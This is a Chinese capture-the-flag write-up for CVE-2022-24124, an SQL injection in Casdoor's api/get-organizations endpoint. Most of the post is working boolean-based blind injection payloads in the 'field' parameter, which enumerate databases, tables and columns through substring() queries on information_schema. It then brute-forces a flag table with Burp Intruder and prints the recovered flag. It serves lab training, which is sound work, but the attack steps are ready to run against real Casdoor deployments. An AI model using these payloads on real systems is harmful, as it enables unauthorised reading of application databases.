CVE-2022-24124

根据提示

访问api/get-organizations

salmap和手工注入都不行,使用substring()

查库,查到有4个库

?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=

(substring((select count(schema_name) from information_schema.schemata),1,1) = '4') <> name

第4个数据库第1个字母:c

?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=(substring

((select schema_name from information_schema.schemata limit 3,1),1,1) = 'c') <> name

(因为计算机是从0开始的,所以3表示第4个库,

1表示第一个字符,c是测试的字符

下边查表、查列、查数据也是如此)

第4个数据库第2个字母:a

?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=(substring

((select schema_name from information_schema.schemata limit% 3,1),1,2) = 'ca') <> name

第4个数据库第3个字母:s

?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=(substring

((select schema_name from information_schema.schemata limit 3,1),1,3) = 'cas') <> name

依次类推得出数据库有7位,数据库名为:casdoor

为什么只有4个库,这个库名为7位,查库时的第5个库和第4个库的第8位开始所有字母都报错,由此推出只有7位,下边查表、查列一样

查表,第一个表名

?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=

(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,11) = 'application') <> name

第二个表名

?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=

(substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,4) = 'role') <> name

第四个表名

?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=

(substring((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,4) = 'flag') <> name

查列名,第一列名

?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=(substring

((select column_name from information_schema.columns where table_schema='casdoor'

and table_name='flag' limit 0,1),1,2) = 'id') <> name

第二列名

?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=(substring

((select column_name from information_schema.columns where table_schema='casdoor'

and table_name='flag' limit 1,1),1,4) = 'flag') <> name

查flag

?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=

(substring((select group_concat(flag) from flag),§1§,1) = '§a§') <> name

(红色部分为bp爆破部分)

使用bp抓包

攻击类型选择,集束炸弹-多个paload集合

攻击完后保存一下

保存为表格形式

首先对我们所需要的长度筛选一下

然后把paload1的顺序改为升序,得到flag

复制出来,Flag:flag{73a62ab4-b564-441e-8f6d-3b7806242c02}

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值